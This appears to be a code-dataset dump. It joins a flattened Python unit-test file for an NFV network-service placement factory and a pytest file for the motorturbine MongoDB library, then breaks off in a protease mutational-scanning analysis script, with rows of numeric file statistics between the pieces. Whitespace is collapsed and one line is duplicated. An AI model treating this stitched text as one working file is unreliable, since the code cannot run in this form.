self.assertEqual(Counter(content_expected), Counter(content_produced), 'trp_link_latency incorrect') def test__produce_trp_link_characteristics_link_latency_with_fewer_vims(self): """ -test with fewer vims compared to pil :return: """ content_expected = [0, 0, 0, 120, 120, 140, 140, 240, 240] nspdf = NsPlacementDataFactory( self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts_fewer_vims), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('pil_unittest1_keys.yaml'), pinning=None) pil_latencies = nspdf._produce_trp_link_characteristics_data('pil_latency') content_produced = [i for row in pil_latencies for i in row] self.assertEqual(Counter(content_expected), Counter(content_produced), 'trp_link_latency incorrect') def test__produce_trp_link_characteristic_not_supported(self): """ - test with non-supported characteristic """ nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('pil_unittest1.yaml'), pinning=None) with self.assertRaises(Exception) as e: nspdf._produce_trp_link_characteristics_data('test_no_support') self.assertRegex(str(e.exception), r'characteristic.*not supported', "invalid exception content") def test__produce_trp_link_characteristics_link_latency(self): """ -test with full set of vims as in pil -test with fewer vims compared to pil -test with more(other) vims compared to pil -test with invalid/corrupt pil configuration file (e.g. missing endpoint), empty file, not yaml conformant - test with non-supported characteristic :return: """ content_expected = [0, 0, 0, 0, 120, 120, 130, 130, 140, 140, 230, 230, 240, 240, 340, 340] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('pil_unittest1_keys.yaml'), pinning=None) pil_latencies = nspdf._produce_trp_link_characteristics_data('pil_latency') content_produced = [i for row in pil_latencies for i in row] self.assertEqual(Counter(content_expected), Counter(content_produced), 'trp_link_latency incorrect') def test__produce_trp_link_characteristics_link_jitter(self): """ -test with full set of vims as in pil """ content_expected = [0, 0, 0, 0, 1200, 1200, 1300, 1300, 1400, 1400, 2300, 2300, 2400, 2400, 3400, 3400] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('pil_unittest1_keys.yaml'), pinning=None) pil_jitter = nspdf._produce_trp_link_characteristics_data('pil_jitter') content_produced = [i for row in pil_jitter for i in row] self.assertEqual(Counter(content_expected), Counter(content_produced), 'trp_link_jitter incorrect') def test__produce_trp_link_characteristics_link_jitter_with_fewer_vims(self): """ -test with fewer vims compared to pil, link jitter """ content_expected = [0, 0, 0, 1200, 1200, 1400, 1400, 2400, 2400] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(self.vim_accounts_fewer_vims), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('pil_unittest1_keys.yaml'), pinning=None) pil_latencies = nspdf._produce_trp_link_characteristics_data('pil_jitter') content_produced = [i for row in pil_latencies for i in row] self.assertEqual(Counter(content_expected), Counter(content_produced), 'trp_link_jitter incorrect') def test__produce_trp_link_characteristics_link_jitter_with_more_vims(self): """ -test with more vims compared to pil, link jitter """ content_expected = [0, 0, 0, 0, 0, 1200, 1200, 1300, 1300, 1400, 1400, 2300, 2300, 2400, 2400, 3400, 3400, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(self.vim_accounts_more_vims), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('pil_unittest1_keys.yaml'), pinning=None) pil_latencies = nspdf._produce_trp_link_characteristics_data('pil_jitter') content_produced = [i for row in pil_latencies for i in row] self.assertEqual(Counter(content_expected), Counter(content_produced), 'trp_link_jitter incorrect') def test__produce_trp_link_characteristics_link_price(self): """ -test with full set of vims as in pil """ content_expected = [0, 0, 0, 0, 12, 12, 13, 13, 14, 14, 23, 23, 24, 24, 34, 34] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('pil_unittest1_keys.yaml'), pinning=None) pil_prices = nspdf._produce_trp_link_characteristics_data('pil_price') content_produced = [i for row in pil_prices for i in row] self.assertEqual(Counter(content_expected), Counter(content_produced), 'invalid trp link prices') def test__produce_trp_link_characteristics_link_price_with_fewer_vims(self): """ -test with fewer vims compared to pil """ content_expected = [0, 0, 0, 12, 12, 14, 14, 24, 24] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(self.vim_accounts_fewer_vims), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('pil_unittest1_keys.yaml'), pinning=None) pil_prices = nspdf._produce_trp_link_characteristics_data('pil_price') content_produced = [i for row in pil_prices for i in row] self.assertEqual(Counter(content_expected), Counter(content_produced), 'invalid trp link prices') def test__produce_trp_link_characteristics_partly_constrained(self): content_expected = [0, 0, 0, 0, 32767, 32767, 32767, 32767, 1200, 1200, 1400, 1400, 2400, 2400, 3400, 3400] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('pil_unittest2_keys.yaml'), pinning=None) pil_jitter = nspdf._produce_trp_link_characteristics_data('pil_jitter') content_produced = [i for row in pil_jitter for i in row] self.assertEqual(Counter(content_expected), Counter(content_produced), 'invalid trp link jitter, partly constrained') def test__produce_vld_desc_partly_constrained(self): vld_desc_expected = [{'cp_refs': ['one', 'two'], 'jitter': 30}, {'cp_refs': ['two', 'three'], 'latency': 120}] nsd = self._get_ut_nsd_from_file('nsd_unittest2.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc incorrect") def test__produce_trp_link_characteristics_link_latency_not_yaml_conformant(self): """ -test with invalid/corrupt pil configuration file (not yaml conformant) """ with self.assertRaises(Exception) as e: _ = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('not_yaml_conformant.yaml'), pinning=None) self.assertRegex(str(e.exception), r'mapping values are not allowed here.*', "invalid exception content") def test__produce_trp_link_characteristics_with_invalid_pil_config(self): """ -test with invalid/corrupt pil configuration file (missing endpoint) """ nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('corrupt_pil_endpoints_config_unittest1.yaml'), pinning=None) with self.assertRaises(Exception) as e: _ = nspdf._produce_trp_link_characteristics_data('pil_latency') self.assertEqual('list index out of range', str(e.exception), "unexpected exception") def test__produce_vld_desc_w_instantiate_override(self): vld_desc_expected = [{'cp_refs': ['one', 'two'], 'latency': 150, 'jitter': 30}, {'cp_refs': ['two', 'three'], 'latency': 90, 'jitter': 30}] nsd = self._get_ut_nsd_from_file('nsd_unittest_no_vld_constraints.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints=None) self.assertNotEqual(nspdf._produce_vld_desc(), vld_desc_expected, "vld_desc incorrect") def test__produce_vld_desc_nsd_w_instantiate_wo(self): """ nsd w/ constraints, instantiate w/o constraints :return: """ vld_desc_expected = [{'cp_refs': ['one', 'two'], 'latency': 150, 'jitter': 30}, {'cp_refs': ['two', 'three'], 'latency': 90, 'jitter': 30}] nsd = self._get_ut_nsd_from_file('nsd_unittest3.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints=None) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc incorrect") def test__produce_vld_desc_nsd_w_instantiate_w(self): """ nsd w/ constraints, instantiate w/ constraints => override :return: """ vld_desc_expected = [{'cp_refs': ['one', 'two'], 'latency': 120, 'jitter': 21}, {'cp_refs': ['two', 'three'], 'latency': 121, 'jitter': 22}] nsd = self._get_ut_nsd_from_file('nsd_unittest3.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints={ 'vld-constraints': [{'id': 'three_vnf_constrained_nsd_vld1', 'link-constraints': {'latency': 120, 'jitter': 21}}, {'id': 'three_vnf_constrained_nsd_vld2', 'link-constraints': {'latency': 121, 'jitter': 22}}]}) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc incorrect") def test__produce_vld_desc_nsd_wo_instantiate_wo(self): """ nsd w/o constraints, instantiate w/o constraints = no constraints in model :return: """ vld_desc_expected = [{'cp_refs': ['one', 'two']}, {'cp_refs': ['two', 'three']}] nsd = self._get_ut_nsd_from_file('nsd_unittest_no_vld_constraints.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints=None) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc incorrect") def test__produce_vld_desc_nsd_wo_instantiate_w(self): """ nsd w/o constraints, instantiate w/ constraints => add constraints :return: """ vld_desc_expected = [{'cp_refs': ['one', 'two'], 'latency': 140, 'jitter': 41}, {'cp_refs': ['two', 'three'], 'latency': 141, 'jitter': 42}] nsd = self._get_ut_nsd_from_file('nsd_unittest_no_vld_constraints.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints={ 'vld-constraints': [{'id': 'three_vnf_constrained_nsd_vld1', 'link-constraints': {'latency': 140, 'jitter': 41}}, {'id': 'three_vnf_constrained_nsd_vld2', 'link-constraints': {'latency': 141, 'jitter': 42}}]}) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc incorrect") def test__produce_vld_desc_nsd_wo_instantiate_w_faulty_input(self): """ nsd w/o constraints, instantiate w/ constraints => add constraints that can be parsed :return: """ vld_desc_expected = [{'cp_refs': ['one', 'two']}, {'cp_refs': ['two', 'three'], 'latency': 151}] nsd = self._get_ut_nsd_from_file('nsd_unittest_no_vld_constraints.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints={'vld-constraints': [{'id': 'not_included_vld', 'misspelled-constraints': {'latency': 120, 'jitter': 20}}, {'id': 'three_vnf_constrained_nsd_vld2', 'link-constraints': { 'latency': 151}}]}) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc incorrect") def test__produce_vld_desc_nsd_wo_instantiate_w_faulty_input_again(self): """ nsd w/o constraints, instantiate w/ faulty constraints => add constraints that can be parsed :return: """ vld_desc_expected = [{'cp_refs': ['one', 'two'], 'jitter': 21}, {'cp_refs': ['two', 'three']}] nsd = self._get_ut_nsd_from_file('nsd_unittest_no_vld_constraints.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints={ 'vld-constraints': [{'id': 'three_vnf_constrained_nsd_vld1', 'link-constraints': {'delay': 120, 'jitter': 21}}, {'id': 'three_vnf_constrained_nsd_vld2', 'misspelled-constraints': {'latency': 121, 'jitter': 22}}]}) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc incorrect") def test__produce_vld_desc_mgmt_network(self): vld_desc_expected = [{'cp_refs': ['1', '2'], 'latency': 120, 'jitter': 20}, {'cp_refs': ['2', '4'], 'latency': 50, 'jitter': 10}, {'cp_refs': ['2', '3'], 'latency': 20, 'jitter': 10}, ] nsd = self._get_ut_nsd_from_file('test_five_nsd.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints=None) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc incorrect") def test__produce_vld_desc_single_vnf_nsd(self): vld_desc_expected = [] nsd = self._get_ut_nsd_from_file('nsd_unittest4.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints=None) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc_incorrect") def test__produce_vld_desc_slice_nsd(self): vld_desc_expected = [] nsd = self._get_ut_nsd_from_file('slice_hackfest_middle_nsd.yaml') nsd = nsd['nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints=None) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc_incorrect") def test__produce_vld_desc(self): """ :return: """ vld_desc_expected = [{'cp_refs': ['one', 'two'], 'latency': 150, 'jitter': 30}, {'cp_refs': ['two', 'three'], 'latency': 90, 'jitter': 30}] nsd = self._get_ut_nsd_from_file('nsd_unittest3.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None, order_constraints=None) self.assertEqual(vld_desc_expected, nspdf._produce_vld_desc(), "vld_desc incorrect") def test__produce_ns_desc(self): """ ToDo - price list sheet with more vims than associated with session - price list sheet with fewer vims than associated with session - nsd with different vndfd-id-refs - fault case scenarios with non-existing vims, non-existing vnfds """ nsd = self._get_ut_nsd_from_file('nsd_unittest3.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None) ns_desc = nspdf._produce_ns_desc() # check that all expected member-vnf-index are present vnfs = [e['vnf_id'] for e in ns_desc] self.assertEqual(Counter(['one', 'two', 'three']), Counter(vnfs), 'vnf_id invalid') expected_keys = ['vnf_id', 'vnf_price_per_vim'] for e in ns_desc: # check that vnf_price_per_vim has proper values self.assertEqual(Counter([5, 10, 30, 30]), Counter(e['vnf_price_per_vim']), 'vnf_price_per_vim invalid') # check that no pinning directives included self.assertEqual(Counter(expected_keys), Counter(e.keys()), 'pinning directive misplaced') def test__produce_ns_desc_with_more_vims(self): nsd = self._get_ut_nsd_from_file('nsd_unittest1.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(self.vim_accounts_more_vims), self._produce_ut_vnf_test_price_list('vnf_price_list_more_vims.yaml'), nsd=nsd, pil_info=None, pinning=None) ns_desc = nspdf._produce_ns_desc() # check that all expected member-vnf-index are present vnfs = [e['vnf_id'] for e in ns_desc] self.assertEqual(Counter([1, 3, 2]), Counter(vnfs), 'vnf_id invalid') expected_keys = ['vnf_id', 'vnf_price_per_vim'] for e in ns_desc: # check that vnf_price_per_vim has proper values self.assertEqual(Counter([5, 10, 30, 30, 3]), Counter(e['vnf_price_per_vim']), 'vnf_price_per_vim invalid') # check that no pinning directives included self.assertEqual(Counter(expected_keys), Counter(e.keys()), 'pinning directive misplaced') def test__produce_ns_desc_with_fewer_vims(self): nsd = self._get_ut_nsd_from_file('nsd_unittest1.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(self.vim_accounts_fewer_vims), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=None) ns_desc = nspdf._produce_ns_desc() # check that all expected member-vnf-index are present vnfs = [e['vnf_id'] for e in ns_desc] self.assertEqual(Counter([1, 3, 2]), Counter(vnfs), 'vnf_id invalid') expected_keys = ['vnf_id', 'vnf_price_per_vim'] for e in ns_desc: # check that vnf_price_per_vim has proper values self.assertEqual(Counter([5, 10, 30]), Counter(e['vnf_price_per_vim']), 'vnf_price_per_vim invalid') # check that no pinning directives included self.assertEqual(Counter(expected_keys), Counter(e.keys()), 'pinning directive misplaced') def test__produce_ns_desc_w_pinning(self): nsd = self._get_ut_nsd_from_file('nsd_unittest3.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] pinning = [{'member-vnf-index': 'two', 'vimAccountId': '331ffdec-44a8-4707-94a1-af7a292d9735'}] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=None, pinning=pinning) ns_desc = nspdf._produce_ns_desc() # check that all expected member-vnf-index are present vnfs = [e['vnf_id'] for e in ns_desc] self.assertEqual(Counter(['one', 'three', 'two']), Counter(vnfs), 'vnf_id invalid') for e in ns_desc: # check that vnf_price_per_vim has proper values self.assertEqual(Counter([5, 10, 30, 30]), Counter(e['vnf_price_per_vim']), 'vnf_price_per_vim invalid') # check that member-vnf-index 2 is pinned correctly if e['vnf_id'] == 'two': self.assertTrue('vim_account' in e.keys(), 'missing pinning directive') self.assertTrue(pinning[0]['vimAccountId'] == e['vim_account'][3:].replace('_', '-'), 'invalid pinning vim-account') else: self.assertTrue('vim-account' not in e.keys(), 'pinning directive misplaced') @mock.patch.object(NsPlacementDataFactory, '_produce_trp_link_characteristics_data') @mock.patch.object(NsPlacementDataFactory, '_produce_vld_desc') @mock.patch.object(NsPlacementDataFactory, '_produce_ns_desc') def test_create_ns_placement_data_wo_order(self, mock_prd_ns_desc, mock_prd_vld_desc, mock_prd_trp_link_char): """ :return: """ vim_accounts_expected = [v.replace('-', '_') for v in ['vim92b056a7-38f5-438d-b8ee-3f93b3531f87', 'vim6618d412-d7fc-4eb0-a6f8-d2c258e0e900', 'vim331ffdec-44a8-4707-94a1-af7a292d9735', 'vimeda92f47-29b9-4007-9709-c1833dbfbe31']] nsd = self._get_ut_nsd_from_file('nsd_unittest3.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=self._populate_pil_info('pil_unittest1.yaml'), pinning=None, order_constraints=None) nspd = nspdf.create_ns_placement_data() self.assertEqual(Counter(vim_accounts_expected), Counter(nspd['vim_accounts']), "vim_accounts incorrect") # mock1.assert_called_once() Note for python > 3.5 self.assertTrue(mock_prd_ns_desc.called, '_produce_ns_desc not called') # mock2.assert_called_once() Note for python > 3.5 self.assertTrue(mock_prd_vld_desc.called, ' _produce_vld_desc not called') mock_prd_trp_link_char.assert_has_calls([call('pil_latency'), call('pil_jitter'), call('pil_price')]) regexps = [r"\{.*\}", r".*'file':.*mznplacement.py", r".*'time':.*datetime.datetime\(.*\)"] generator_data = str(nspd['generator_data']) for regex in regexps: self.assertRegex(generator_data, regex, "generator data invalid") @mock.patch.object(NsPlacementDataFactory, '_produce_trp_link_characteristics_data') @mock.patch.object(NsPlacementDataFactory, '_produce_vld_desc') @mock.patch.object(NsPlacementDataFactory, '_produce_ns_desc') def test_create_ns_placement_data_w_order(self, mock_prd_ns_desc, mock_prd_vld_desc, mock_prd_trp_link_char): """ :return: """ vim_accounts_expected = [v.replace('-', '_') for v in ['vim92b056a7-38f5-438d-b8ee-3f93b3531f87', 'vim6618d412-d7fc-4eb0-a6f8-d2c258e0e900', 'vim331ffdec-44a8-4707-94a1-af7a292d9735', 'vimeda92f47-29b9-4007-9709-c1833dbfbe31']] nsd = self._get_ut_nsd_from_file('nsd_unittest3.yaml') nsd = nsd['nsd:nsd-catalog']['nsd'][0] nspdf = NsPlacementDataFactory(self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts), self._produce_ut_vnf_price_list(), nsd=nsd, pil_info=self._populate_pil_info('pil_unittest1.yaml'), pinning=None, order_constraints={ 'vld-constraints': [{'id': 'three_vnf_constrained_nsd_vld1', 'link-constraints': {'latency': 120, 'jitter': 21}}, {'id': 'three_vnf_constrained_nsd_vld2', 'link-constraints': {'latency': 121, 'jitter': 22}}]} ) nspd = nspdf.create_ns_placement_data() self.assertEqual(Counter(vim_accounts_expected), Counter(nspd['vim_accounts']), "vim_accounts incorrect") # mock1.assert_called_once() Note for python > 3.5 self.assertTrue(mock_prd_ns_desc.called, '_produce_ns_desc not called') # mock2.assert_called_once() Note for python > 3.5 self.assertTrue(mock_prd_vld_desc.called, ' _produce_vld_desc not called') mock_prd_trp_link_char.assert_has_calls([call('pil_latency'), call('pil_jitter'), call('pil_price')]) regexps = [r"\{.*\}", r".*'file':.*mznplacement.py", r".*'time':.*datetime.datetime\(.*\)"] generator_data = str(nspd['generator_data']) for regex in regexps: self.assertRegex(generator_data, regex, "generator data invalid") if __name__ == "__main__": if __name__ == '__main__': unittest.main()
62.696203
120
0.53515
4,918
49,530
5.068117
0.092721
0.033099
0.031294
0.024875
0.87005
0.852598
0.835948
0.822869
0.811113
0.791976
0
0.08592
0.357319
49,530
789
121
62.775665
0.697097
0.07658
0
0.747826
0
0
0.22332
0.084997
0
0
0
0.002535
0.088696
1
0.062609
false
0.02087
0.013913
0
0.095652
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
73cd90dc38d5d3941cfd82df154fcb2affc3dad2
4,691
py
Python
tests/fields/test_document_field.py
BFriedrichs/motorturbine
a9585bef6959f8ceede2b64e4c296524f797aa68
[ "MIT" ]
1
2019-04-16T14:47:32.000Z
2019-04-16T14:47:32.000Z
tests/fields/test_document_field.py
BFriedrichs/motorturbine
a9585bef6959f8ceede2b64e4c296524f797aa68
[ "MIT" ]
null
null
null
tests/fields/test_document_field.py
BFriedrichs/motorturbine
a9585bef6959f8ceede2b64e4c296524f797aa68
[ "MIT" ]
null
null
null
import pytest from motorturbine import BaseDocument, fields, errors, connection, updateset from pymongo import errors as pymongo_errors @pytest.mark.asyncio async def test_document(db_config, database): connection.Connection.connect(**db_config) class IntDoc(BaseDocument): num = fields.IntField() class EmbedDoc(BaseDocument): ref = fields.DocumentField(IntDoc) doc1 = IntDoc(num=2) ref_doc = EmbedDoc(ref=doc1) await ref_doc.save() coll = database['EmbedDoc'] saved = coll.find_one() assert saved['ref'] == doc1.to_json() @pytest.mark.asyncio async def test_load_document(db_config, database): connection.Connection.connect(**db_config) class IntDoc(BaseDocument): num = fields.IntField() class EmbedDoc(BaseDocument): ref = fields.DocumentField(IntDoc) doc1 = IntDoc(num=2) ref_doc = EmbedDoc(ref=doc1) await ref_doc.save() loaded = await EmbedDoc.get_object() assert hasattr(loaded, 'ref') assert hasattr(loaded.ref, 'num') assert loaded.ref.num == 2 @pytest.mark.asyncio async def test_update_document(db_config, database): connection.Connection.connect(**db_config) class IntDoc(BaseDocument): num = fields.IntField() class EmbedDoc(BaseDocument): ref = fields.DocumentField(IntDoc) doc1 = IntDoc(num=2) ref_doc = EmbedDoc(ref=doc1) await ref_doc.save() ref_doc.ref.num = 10 await ref_doc.save() coll = database['EmbedDoc'] saved = coll.find_one() assert ref_doc.ref.num == 10 assert saved['ref']['num'] == 10 @pytest.mark.asyncio async def test_load_update(db_config, database): connection.Connection.connect(**db_config) class IntDoc(BaseDocument): num = fields.IntField() class EmbedDoc(BaseDocument): ref = fields.DocumentField(IntDoc) doc1 = IntDoc(num=2) ref_doc = EmbedDoc(ref=doc1) await ref_doc.save() ref_doc.ref.num = 10 await ref_doc.save() loaded = await EmbedDoc.get_object() assert hasattr(loaded, 'ref') assert hasattr(loaded.ref, 'num') assert loaded.ref.num == 10 @pytest.mark.asyncio async def test_map_embed(db_config, database): connection.Connection.connect(**db_config) class IntDoc(BaseDocument): num = fields.IntField() class EmbedDoc(BaseDocument): ref = fields.MapField(fields.DocumentField(IntDoc)) doc = EmbedDoc(ref={'test': IntDoc(num=5)}) await doc.save() assert doc.ref['test'].num == 5 saved = await EmbedDoc.get_object() assert doc.ref['test'].num == 5 doc.ref['test'].num = 10 doc.ref['test'].num = updateset.Inc(5) await doc.save() saved = await EmbedDoc.get_object() assert doc.ref['test'].num == 15 @pytest.mark.asyncio async def test_list_embed(db_config, database): connection.Connection.connect(**db_config) class IntDoc(BaseDocument): num = fields.IntField() class EmbedDoc(BaseDocument): ref = fields.ListField(fields.DocumentField(IntDoc)) doc = EmbedDoc(ref=[IntDoc(num=5), IntDoc(num=10)]) await doc.save() assert doc.ref[0].num == 5 assert doc.ref[1].num == 10 saved = await EmbedDoc.get_object() assert doc.ref[0].num == 5 assert doc.ref[1].num == 10 doc.ref[0].num = 10 doc.ref[0].num = updateset.Inc(5) await doc.save() saved = await EmbedDoc.get_object() assert doc.ref[0].num == 15 @pytest.mark.asyncio async def test_set_map(db_config, database): connection.Connection.connect(**db_config) class IntDoc(BaseDocument): num = fields.IntField() class EmbedDoc(BaseDocument): ref_map = fields.MapField(fields.DocumentField(IntDoc)) doc = EmbedDoc(ref_map={'a': IntDoc(num=0)}) await doc.save() saved = await EmbedDoc.get_object() saved.ref_map = {'another': IntDoc(num=999), 'test': IntDoc(num=-5)} await saved.save() saved = await EmbedDoc.get_object() json = {'another': {'num': 999}, 'test': {'num': -5}} assert saved.to_json()['ref_map'] == json @pytest.mark.asyncio async def test_set_list(db_config, database): connection.Connection.connect(**db_config) class IntDoc(BaseDocument): num = fields.IntField() class EmbedDoc(BaseDocument): ref_lst = fields.ListField(fields.DocumentField(IntDoc)) doc = EmbedDoc(ref_lst=[IntDoc(num=5)]) await doc.save() saved = await EmbedDoc.get_object() saved.ref_lst = [IntDoc(num=10), IntDoc(num=11)] await saved.save() saved = await EmbedDoc.get_object() json = [{'num': 10}, {'num': 11}] assert saved.to_json()['ref_lst'] == json
24.432292
76
0.664251
610
4,691
4.996721
0.103279
0.041995
0.052493
0.072178
0.893701
0.870079
0.823819
0.797572
0.710958
0.658793
0
0.018928
0.200384
4,691
191
77
24.560209
0.793655
0
0
0.71875
0
0
0.023449
0
0
0
0
0
0.148438
1
0
false
0
0.023438
0
0.273438
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
73d42734ec63ff2475c32dd0394530eca6b78484
37,456
py
Python
scripts/matrix_transform.py
ChavezResearchLab/3CL_protease_DMS
14593bdbc4586393eec6ec1d9ebbf3ef34eda44b
[ "MIT" ]
null
null
null
scripts/matrix_transform.py
ChavezResearchLab/3CL_protease_DMS
14593bdbc4586393eec6ec1d9ebbf3ef34eda44b
[ "MIT" ]
1
2021-04-13T19:27:36.000Z
2021-04-13T19:27:36.000Z
scripts/matrix_transform.py
ChavezResearchLab/3CL_protease_DMS
14593bdbc4586393eec6ec1d9ebbf3ef34eda44b
[ "MIT" ]
1
2021-02-09T23:16:38.000Z
2021-02-09T23:16:38.000Z
#!/Users/jennysheng/anaconda3/envs/tools/bin/python import sys import os import glob import numpy as np import pandas as pd import gzip import matplotlib.pyplot as plt from scipy import stats from scipy.optimize import curve_fit import itertools from collections import Counter import plotly.express as px import plotly.graph_objects as go from plotly.subplots import make_subplots wt_full = ('MSGFRKMAFPSGKVEGCMVQVTCGTTTLNGLWLDDVVYCPRHVICT' 'SEDMLNPNYEDLLIRKSNHNFLVQAGNVQLRVIGHSMQNCVLKLKV' 'DTANPKTPKYKFVRIQPGQTFSVLACYNGSPSGVYQCAMRPNFTIK' 'GSFLNGSCGSVGFNIDYDCVSFCYMHHMELPTGVHAGTDLEGNFYG' 'PFVDRQTAQAAGTDTTITVNVLAWLYAAVINGDRWFLNRFTTTLND' 'FNLVAMKYNYEPLTQDHVDILGPLSAQTGIAVLDMCASLKELLQNG' 'MNGRTILGSALLEDEFTPFDVVRQCSGVTFQ') def original_dist( folder, suffix, samples, sets, res_redo, all_sets, save = False, **kwarg): ''' Distribution shape of original scores from screen. _______________ Input: folder: column name in sample spreadsheet that points to folder suffix: suffix of the file name if save = True add kwarg name: file path for saving figure ''' fig = make_subplots( rows=5, cols=6) layout= itertools.product(range(1,6), range(1,7)) for x, pos in list(zip(sets + res_redo, layout)): # old replicates if x in sets: fchange = pd.read_csv(list(samples[samples['Set']==\ 